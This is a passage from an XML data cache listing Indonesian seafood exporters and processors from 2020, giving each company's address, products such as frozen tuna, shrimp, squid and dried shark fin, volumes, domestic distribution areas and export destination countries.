    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16860"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Bawal, Malong, Gulama, Lencam, Manyung, Kuwe, Kerapu, Layur, Kakatua, Kakap, Ayam-ayam, Kuro, Ekor Kuning)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16862"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Segar"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16864"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16865"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16866"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16867"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16868"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19934"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19935"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19936"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20048"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="671174"/>
    <s v="Kota Jakarta Selatan, Kota Denpasar"/>
    <s v="Australia, Philippines, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="16875"/>
    <x v="44"/>
    <s v="PT. AGARINDO BOGATAMA"/>
    <s v="Jl. Raya Pasar Kemis Km 6, Kel. Sukamantri, Kec. Pasar Kemis, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Agar-agar"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Medan, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="China, Czech Republic, France, Italy, Japan, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="19969"/>
    <x v="45"/>
    <s v="PT, BINTANG JAYAKOTA MANDIRI"/>
    <s v="Jl, Ikan Tuna Raya IV No,16, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Meka, Gindara, Cakalang, Tenggiri)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Jakarta Utara, Kabupaten Badung, Kota Denpasar"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="19968"/>
    <x v="45"/>
    <s v="PT, BINTANG JAYAKOTA MANDIRI"/>
    <s v="Jl, Ikan Tuna Raya IV No,16, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="250000"/>
    <s v="Kabupaten Badung, Kota Denpasar"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20690"/>
    <x v="46"/>
    <s v="CV. DELTA MINA JAYA"/>
    <s v="Pergudangan Safe N Lock Blok F-1532, Jl. Lingkar Timur Km 5,5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan, Korea, Democratic People's Republic of, Sri Lanka, Suriname, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20638"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swangi, Gulama, Sebelah, Senangin, Biji Nangka, Kuniran, Layur, Kakap, Kuro, Kurisi, Barramundi, Kerapu)"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Rembang, Kabupaten Tuban, Kabupaten Lamongan"/>
    <s v="China, Egypt, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20833"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Lobster Beku"/>
    <d v="2020-06-24T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Brunei Darussalam, China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21153"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="1194066"/>
    <m/>
    <s v="Belgium, France, Netherlands, Singapore, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="17161"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barakuda, Kakap Putih, Swanggi, Bawal Hitam, Gulama)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Lamongan, Kota Surabaya, Kota Tangerang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Oman, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20331"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States"/>
  </r>
  <r>
    <n v="20332"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States"/>
  </r>
  <r>
    <n v="20333"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Scombroid Beku"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States"/>
  </r>
  <r>
    <n v="20334"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Lencam, Anggoli, Kerapu, Jenaha, Lutjanus, Kakatua, Kakap, Ekor Kuning, Barramundi)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States"/>
  </r>
  <r>
    <n v="20335"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Kuwe, Nike, Tamban)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States"/>
  </r>
  <r>
    <n v="20338"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Mujair, Bandeng, Patin, Nila)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1331000"/>
    <m/>
    <s v="Australia, Japan, Korea, Democratic People's Republic of, Russian Federation, United States"/>
  </r>
  <r>
    <n v="17155"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Beku Hasil Budidaya (Lele, Bandeng, Mujair, Udang, Nila)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Probolinggo, Kota Probolinggo, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Sri Lanka, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20543"/>
    <x v="51"/>
    <s v="PT, AGROMINA WICAKSANA"/>
    <s v="Jl, Berbek Industri V No,25 B, Kel, Berbek, Kec, Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20544"/>
    <x v="51"/>
    <s v="PT, AGROMINA WICAKSANA"/>
    <s v="Jl, Berbek Industri V No,25 B, Kel, Berbek, Kec, Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Barakuda, Kembung, Lemadang, Talang-talang, Layang, Tenggiri)"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19440"/>
    <x v="52"/>
    <s v="PT. BAHARI PRATAMA MANDIRI"/>
    <s v="Jl. Pelita Cipatuguran RT 04 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Segar"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20194"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Mata Besar, Gulama, Anggoli, Kerapu, Layur, Kapasan, Kakap, Ayam-ayam, Bloso, Jaket, Pari, Jengot)"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="750000"/>
    <m/>
    <s v="Belgium, China, Korea, Democratic People's Republic of, Malaysia, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20256"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21145"/>
    <x v="29"/>
    <s v="PT. MARITIM NUSANTARA PERKASA"/>
    <s v="Kawasan Pelabuhan Perikanan Nizam Zachman Jl. Muara Baru Ujung Blok T No.8 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21026"/>
    <x v="54"/>
    <s v="PT. TEMAN LAUT"/>
    <s v="Jl. Raya Perancis No.2 Pergudangan Pantai Indah Dadap Blok BA No.21-22, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21027"/>
    <x v="54"/>
    <s v="PT. TEMAN LAUT"/>
    <s v="Jl. Raya Perancis No.2 Pergudangan Pantai Indah Dadap Blok BA No.21-22, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21029"/>
    <x v="54"/>
    <s v="PT. TEMAN LAUT"/>
    <s v="Jl. Raya Perancis No.2 Pergudangan Pantai Indah Dadap Blok BA No.21-22, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Chile, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20639"/>
    <x v="47"/>
    <s v="KOPERASI PERIKANAN MINA RIZKI ABADI"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Kembung, Muroaji, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="250000"/>
    <s v="Kabupaten Trenggalek, Kabupaten Pasuruan, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Bangkalan, Kabupaten Sumenep"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20235"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Barramundi, Emperor, Anggoli, Kerapu, Layur, Kakatua, Kakap)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="20236"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Makerel, Lemadang, Meka, Sarden, Tenggiri)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="20237"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia, China, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="20238"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan , Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Australia, China, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="20239"/>
    <x v="55"/>
    <s v="UD. DAMENA"/>
    <s v="Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Makerel, Lemadang, Meka, Sarden, Tenggiri)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Australia, China, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="20999"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Segar"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="17159"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Barakuda, Deho, Layur, Kembung, Salem, Sero, Tamban)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Lamongan, Kota Surabaya, Kota Tangerang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21299"/>
    <x v="14"/>
    <s v="PT. CAKRAWALA SAMUDERA MANDIRI"/>
    <s v="Kompleks PPN Ambon, Jl. Sultan Hasanudin RT 03 RW 011, Kel. Batu Merah, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Depok, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Makassar"/>
    <s v="Australia, France, Italy, Japan, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20714"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bekasi, Kota Tangerang"/>
    <s v="Korea, Democratic People's Republic of, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21186"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Hidup"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="25500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21187"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="21000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21188"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Hidup"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21189"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="25500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21347"/>
    <x v="57"/>
    <s v="PT. LAUT BIRU INDONESIA TIMUR"/>
    <s v="Jl. Terusan Bandengan Utara No. 95 Blok E No. 6 RT 003 RW 016, Kel. Pejagalan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
